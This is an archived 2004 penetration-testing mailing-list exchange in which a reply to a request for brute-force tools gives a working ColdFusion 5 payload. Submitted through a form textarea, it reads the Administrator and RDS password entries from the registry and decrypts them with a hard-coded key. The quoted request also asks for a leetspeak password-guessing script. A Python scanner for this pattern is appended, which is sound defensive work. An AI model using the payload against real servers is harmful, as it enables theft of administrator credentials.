From: Tom (tommy@providesecurity.com)
Date: Fri May 21 2004 - 10:53:30 EDT
What do you mean Crack Cold Fusion?
Crack the Administrator?
If you're running Cold Fusion 5 on Windows...
Submit this into a TEXTAREA on a form:
<CFSET PASSWORD_KEY = "4p0L@r1$">
<!--- Where Your Passwords are stored In Registry --->
<cfregistry action="GET"
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"
entry="AdminPassword" variable="adminpassword"
type="String">
<cfregistry action="GET"
branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"
entry="StudioPassword" variable="studiopassword"
type="String">
<!--- Output Passwords To Screen using an undocumented "cfusion_Decrypt" Function --->
<cfoutput><b>Admin Password:</b>
#evaluate("cfusion_Decrypt(adminpassword, PASSWORD_KEY )")#</cfoutput><br>
<cfoutput><b>RDS Password:</b>
#evaluate("cfusion_Decrypt(studiopassword, PASSWORD_KEY )")#</cfoutput><br>
This will decrypt the ColdFusion Administrator and RDS passwords.
It ONLY works with Cold Fusion 5. I am currently looking for a similar
workaround on Cold Fusion MX.
Good Luck!
Tom Ryan
-----Original Message-----
From: don.williams@verizonwireless.com [mailto:don.williams@verizonwireless.com]
Sent: Thursday, May 20, 2004 19:34
To: pen-test@securityfocus.com
Subject: brute force tools
Frequently I attempt to brute force web applications and have found a few
problems with the programs I have used. For instance, (1) Brutus always informs
me of a few successful attempts, yet when I try them they fail. (2) Webcrack is
not reliable.
What I would like is some other tools you may have used with good success
and hopefully a Perl-based script which enumerates common words, substituting
letters for numbers as users do every day (i.e. pa$$w0rd). Also, when attempting
to crack ColdFusion, it only requests the password, not the user name / password
combo as most tools only allow. Windows or Linux is fine.
Thx
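
The tag, registry entries and function named in the reply above are distinctive enough to detect. The following is an added example (not part of the original thread and not ColdFusion's own code) that scans a CFML template or a submitted form field for `cfregistry` access to the ColdFusion `Server` branch and for calls to `cfusion_Decrypt`. The name `scan_cfml`, the rule labels and both sample strings are constructed for illustration.

```python
import re

# Patterns built from the tag, registry entries and function named in the post.
TAG_RE = re.compile(r"<cfregistry\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
DECRYPT_RE = re.compile(r"\bcfusion_decrypt\s*\(", re.IGNORECASE)
SERVER_BRANCH = r"software\allaire\coldfusion\currentversion\server"
PASSWORD_ENTRIES = {"adminpassword", "studiopassword"}

# Constructed samples (not taken from a real application).
SAMPLE_SUSPICIOUS = r'''<h1>Report</h1>
<CFRegistry Action="Get"
  branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
"
  entry="AdminPassword" variable="p" type="String">
<cfoutput>#evaluate("cfusion_Decrypt(p, k)")#</cfoutput>
'''
SAMPLE_BENIGN = r'''<cfregistry action="get"
  branch="HKEY_LOCAL_MACHINE\SOFTWARE\ExampleApp"
  entry="Theme" variable="theme" type="String">
'''


def _line_of(text, offset):
    """1-based line number of a character offset."""
    return text.count("\n", 0, offset) + 1


def scan_cfml(text):
    """Return sorted (line, rule) findings for a template or submitted form field."""
    findings = []
    for tag in TAG_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag.group(0))}
        # Values wrapped across lines (as in mail archives) still have to match.
        branch = "".join(attrs.get("branch", "").split()).lower()
        entry = attrs.get("entry", "").strip().lower()
        if branch.endswith(SERVER_BRANCH):
            rule = ("password-entry-read:" + entry if entry in PASSWORD_ENTRIES
                    else "server-branch-access")
            findings.append((_line_of(text, tag.start()), rule))
    for call in DECRYPT_RE.finditer(text):
        findings.append((_line_of(text, call.start()), "cfusion_decrypt-call"))
    return sorted(findings)


if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_cfml(sample))
```
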